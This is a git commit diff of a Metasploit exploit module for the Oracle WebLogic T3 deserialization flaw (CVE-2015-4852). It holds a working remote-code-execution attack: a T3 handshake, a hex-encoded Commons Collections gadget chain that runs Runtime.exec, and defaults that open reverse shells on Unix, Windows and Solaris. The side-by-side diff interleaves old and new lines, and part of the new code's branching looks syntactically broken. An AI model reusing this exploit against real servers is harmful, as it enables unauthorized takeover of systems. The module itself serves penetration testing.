Some fixes to pass msftidy.

master
Andres Rodriguez 2018-12-15 18:32:17 -08:00
parent 446144ba8e
commit 82db6025c9
1 changed files with 261 additions and 262 deletions

View File

@ -6,289 +6,288 @@
require 'msf/core/exploit/powershell' require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell include Msf::Exploit::Powershell
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => 'Oracle Weblogic Server Deserialization RCE - Raw Object', 'Name' => 'Oracle Weblogic Server Deserialization RCE - Raw Object',
'Description' => %q{ 'Description' => %q{
An unauthenticated attacker with network access to the Oracle Weblogic Server T3 An unauthenticated attacker with network access to the Oracle Weblogic Server T3
interface can send a serialized object (weblogic.jms.common.StreamMessageImpl) interface can send a serialized object (weblogic.jms.common.StreamMessageImpl)
to the interface to execute code on vulnerable hosts. to the interface to execute code on vulnerable hosts.
}, },
'Author' => 'Author' =>
[ [
'Andres Rodriguez <arodriguez[at]2secure.org>', # Metasploit Module - (@acamro, acamro[at]gmail.com) 'Andres Rodriguez <arodriguez[at]2secure.org>', # Metasploit Module - (@acamro, acamro[at]gmail.com)
'Stephen Breen', # Vulnerability Discovery 'Stephen Breen', # Vulnerability Discovery
'Jacob Robles' # Metasploit Module Template 'Jacob Robles' # Metasploit Module Template
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
[ [
['CVE', '2015-4852'] ['CVE', '2015-4852']
], ],
'Privileged' => false, 'Privileged' => false,
'Platform' => %w{ unix win solaris }, 'Platform' => %w{ unix win solaris },
'Targets' => 'Targets' =>
[ [
[ 'Unix', [ 'Unix',
'Platform' => 'unix', 'Platform' => 'unix',
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'}, 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},
'Payload' => { 'Payload' => {
'Encoder' => 'cmd/ifs', 'Encoder' => 'cmd/ifs',
'BadChars' => ' ', 'BadChars' => ' ',
'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'} 'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'}
} }
], ],
[ 'Windows', [ 'Windows',
'Platform' => 'win', 'Platform' => 'win',
'Payload' => {}, 'Payload' => {},
'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'} 'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
], ],
[ 'Solaris', [ 'Solaris',
'Platform' => 'solaris', 'Platform' => 'solaris',
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}, 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
'Payload' => { 'Payload' => {
'Space' => 2048, 'Space' => 2048,
'DisableNops' => true, 'DisableNops' => true,
'Compat' => 'Compat' =>
{ {
'PayloadType' => 'cmd', 'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet', 'RequiredCmd' => 'generic perl telnet',
} }
} }
], ]
[ 'Java (Generic)', ],
'Platform' => 'java', 'DefaultTarget' => 0,
'Arch' => ARCH_JAVA 'DefaultOptions' =>
] {
], 'RPORT' => 7001
'DefaultTarget' => 0, },
'DefaultOptions' => 'DisclosureDate' => 'Jan 28 2015'))
{ end
'RPORT' => 7001
},
'DisclosureDate' => 'Jan 28 2015'))
end
def check def check
connect connect
req = "GET /console/login/LoginForm.jsp HTTP/1.1\n" req = "GET /console/login/LoginForm.jsp HTTP/1.1\n"
req << "Host: #{peer}\n\n" req << "Host: #{peer}\n\n"
sock.put(req) sock.put(req)
res = sock.get_once res = sock.get_once
disconnect disconnect
return CheckCode::Unknown unless res return CheckCode::Unknown unless res
/WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.*\d*)/ =~ res /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.*\d*)/ =~ res
if version if version
version = Gem::Version.new(version) version = Gem::Version.new(version)
vprint_good("Detected Oracle WebLogic Server Version: #{version.to_s}") vprint_good("Detected Oracle WebLogic Server Version: #{version.to_s}")
case case
when version.to_s.start_with?('10.3') when version.to_s.start_with?('10.3')
return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0') return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
when version.to_s.start_with?('12.1.2') when version.to_s.start_with?('12.1.2')
return CheckCode::Appears unless version > Gem::Version.new('12.1.2.0') return CheckCode::Appears unless version > Gem::Version.new('12.1.2.0')
when version.to_s.start_with?('12.1.3') when version.to_s.start_with?('12.1.3')
return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0') return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
when version.to_s.start_with?('12.2') when version.to_s.start_with?('12.2')
return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0') return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')
end end
end end
if res.include?('Oracle WebLogic Server Administration Console') if res.include?('Oracle WebLogic Server Administration Console')
return CheckCode::Detected return CheckCode::Detected
end end
CheckCode::Unknown CheckCode::Unknown
end end
def t3_handshake def t3_handshake
shake = '74332031322e322e310a41533a323535' shake = '74332031322e322e310a41533a323535'
shake << '0a484c3a31390a4d533a313030303030' shake << '0a484c3a31390a4d533a313030303030'
shake << '30300a0a' shake << '30300a0a'
sock.put([shake].pack('H*')) sock.put([shake].pack('H*'))
sleep(1) sleep(1)
sock.get_once sock.get_once
end end
def build_t3_request_object def build_t3_request_object
# T3 request serialized data # T3 request serialized data
data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a' data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278' data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'
data << '700000000a000000030000000000000006007070707070700000000a00000003' data << '700000000a000000030000000000000006007070707070700000000a00000003'
data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e' data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'
data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078' data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'
data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163' data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'
data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69' data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'
data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b' data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'
data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012' data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'
data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271' data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'
data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01' data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'
data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162' data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'
data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e' data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'
data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164' data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'
data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63' data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'
data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265' data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'
data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67' data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'
data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477' data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'
data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549' data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'
data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900' data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'
data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465' data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a' data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'
data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e' data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'
data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a' data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'
data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072' data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'
data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249' data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'
data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900' data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'
data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465' data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c' data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'
data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f' data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'
data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665' data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'
data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371' data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61' data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'
data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374' data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'
data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c' data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'
data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249' data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'
data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365' data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'
data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c' data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'
data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56' data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'
data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200' data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'
data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078' data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'
data << '707750210000000000000000000d3139322e3136382e312e323237001257494e' data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'
data << '2d4147444d565155423154362e656883348cd6000000070000' data << '2d4147444d565155423154362e656883348cd6000000070000'
data << rport.to_s(16).rjust(4, '0') data << rport.to_s(16).rjust(4, '0')
data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00' data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'
data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a' data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'
data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461' data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'
data << '863d1d0000000078' data << '863d1d0000000078'
sock.put([data].pack('H*')) sock.put([data].pack('H*'))
sleep(1) sleep(1)
sock.get_once sock.get_once
end end
def send_payload_objdata def send_payload_objdata
# payload creation # payload creation
if target.name == 'Windows' if target.name == 'Windows'
pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true}) pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join
else else if target.name == 'Unix'
nix_cmd = payload.encoded nix_cmd = payload.encoded
nix_cmd.prepend('/bin/sh -c ') nix_cmd.prepend('/bin/sh -c ')
mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
end else if target.name == 'Solaris'
sol_cmd = payload.encoded
serialized_cmd = (mycmd.length >> 1).to_s(16).rjust(4,'0') mycmd = sol_cmd.each_byte.map {|b| b.to_s(16)}.join
serialized_cmd << mycmd end
payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'
payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'
payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'
payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'
payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'
payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'
payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'
payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'
payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'
payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'
payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'
payload << '78707702000078fe010000'
# new payload serialized_cmd = (mycmd.length >> 1).to_s(16).rjust(4,'0')
payload << 'aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e41' serialized_cmd << mycmd
payload << '6e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb'
payload << '7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f757469'
payload << '6c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c617373'
payload << '3b7870737d00000001000d6a6176612e7574696c2e4d6170787200176a617661'
payload << '2e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c00'
payload << '01687400254c6a6176612f6c616e672f7265666c6563742f496e766f63617469'
payload << '6f6e48616e646c65723b78707371007e00007372002a6f72672e617061636865'
payload << '2e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d6170'
payload << '6ee594829e7910940300014c0007666163746f727974002c4c6f72672f617061'
payload << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'
payload << '6d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c'
payload << '6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f'
payload << '726d657230c797ec287a97040200015b000d695472616e73666f726d65727374'
payload << '002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f'
payload << '6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368'
payload << '652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65'
payload << '723bbd562af1d83418990200007870000000057372003b6f72672e6170616368'
payload << '652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e43'
payload << '6f6e7374616e745472616e73666f726d6572587690114102b1940200014c0009'
payload << '69436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870'
payload << '767200116a6176612e6c616e672e52756e74696d650000000000000000000000'
payload << '78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374'
payload << '696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d6572'
payload << '87e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e'
payload << '672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f'
payload << '6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a'
payload << '6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e67'
payload << '2e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452'
payload << '756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7ae'
payload << 'cbcd5a990200007870000000007400096765744d6574686f647571007e001e00'
payload << '000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202'
payload << '000078707671007e001e7371007e00167571007e001b00000002707571007e00'
payload << '1b00000000740006696e766f6b657571007e001e00000002767200106a617661'
payload << '2e6c616e672e4f626a656374000000000000000000000078707671007e001b73'
payload << '71007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7'
payload << 'e91d7b4702000078700000000174'
payload << serialized_cmd
payload << '740004657865637571007e001e0000000171007e00237371007e001173720011'
payload << '6a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576'
payload << '616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'
payload << '020000787000000001737200116a6176612e7574696c2e486173684d61700507'
payload << 'dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f'
payload << '6c6478703f40000000000000770800000010000000007878767200126a617661'
payload << '2e6c616e672e4f766572726964650000000000000000000000787071007e003a'
# serialized end
payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'
payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'
payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'
payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'
payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'
payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'
payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'
payload << '6f3b290000001b7878fe00ff'
data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0') payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
data << payload payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'
payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'
payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'
payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'
payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'
payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'
payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'
payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'
payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'
payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'
payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'
payload << '78707702000078fe010000'
sock.put([data].pack('H*')) # new payload
sleep(1) payload << 'aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e41'
sock.get_once payload << '6e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb'
payload << '7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f757469'
end payload << '6c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c617373'
payload << '3b7870737d00000001000d6a6176612e7574696c2e4d6170787200176a617661'
payload << '2e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c00'
payload << '01687400254c6a6176612f6c616e672f7265666c6563742f496e766f63617469'
payload << '6f6e48616e646c65723b78707371007e00007372002a6f72672e617061636865'
payload << '2e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d6170'
payload << '6ee594829e7910940300014c0007666163746f727974002c4c6f72672f617061'
payload << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'
payload << '6d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c'
payload << '6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f'
payload << '726d657230c797ec287a97040200015b000d695472616e73666f726d65727374'
payload << '002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f'
payload << '6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368'
payload << '652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65'
payload << '723bbd562af1d83418990200007870000000057372003b6f72672e6170616368'
payload << '652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e43'
payload << '6f6e7374616e745472616e73666f726d6572587690114102b1940200014c0009'
payload << '69436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870'
payload << '767200116a6176612e6c616e672e52756e74696d650000000000000000000000'
payload << '78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374'
payload << '696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d6572'
payload << '87e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e'
payload << '672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f'
payload << '6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a'
payload << '6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e67'
payload << '2e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452'
payload << '756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7ae'
payload << 'cbcd5a990200007870000000007400096765744d6574686f647571007e001e00'
payload << '000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202'
payload << '000078707671007e001e7371007e00167571007e001b00000002707571007e00'
payload << '1b00000000740006696e766f6b657571007e001e00000002767200106a617661'
payload << '2e6c616e672e4f626a656374000000000000000000000078707671007e001b73'
payload << '71007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7'
payload << 'e91d7b4702000078700000000174'
def exploit payload << serialized_cmd
connect
print_status('Sending handshake...')
t3_handshake
print_status('Sending T3 request object...') payload << '740004657865637571007e001e0000000171007e00237371007e001173720011'
build_t3_request_object payload << '6a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576'
payload << '616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'
payload << '020000787000000001737200116a6176612e7574696c2e486173684d61700507'
payload << 'dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f'
payload << '6c6478703f40000000000000770800000010000000007878767200126a617661'
payload << '2e6c616e672e4f766572726964650000000000000000000000787071007e003a'
# serialized end
print_status('Sending client object payload...') payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'
send_payload_objdata payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'
payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'
payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'
payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'
payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'
payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'
payload << '6f3b290000001b7878fe00ff'
handler data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
disconnect data << payload
end
sock.put([data].pack('H*'))
sleep(1)
sock.get_once
end
def exploit
connect
print_status('Sending handshake...')
t3_handshake
print_status('Sending T3 request object...')
build_t3_request_object
print_status('Sending client object payload...')
send_payload_objdata
handler
disconnect
end
end end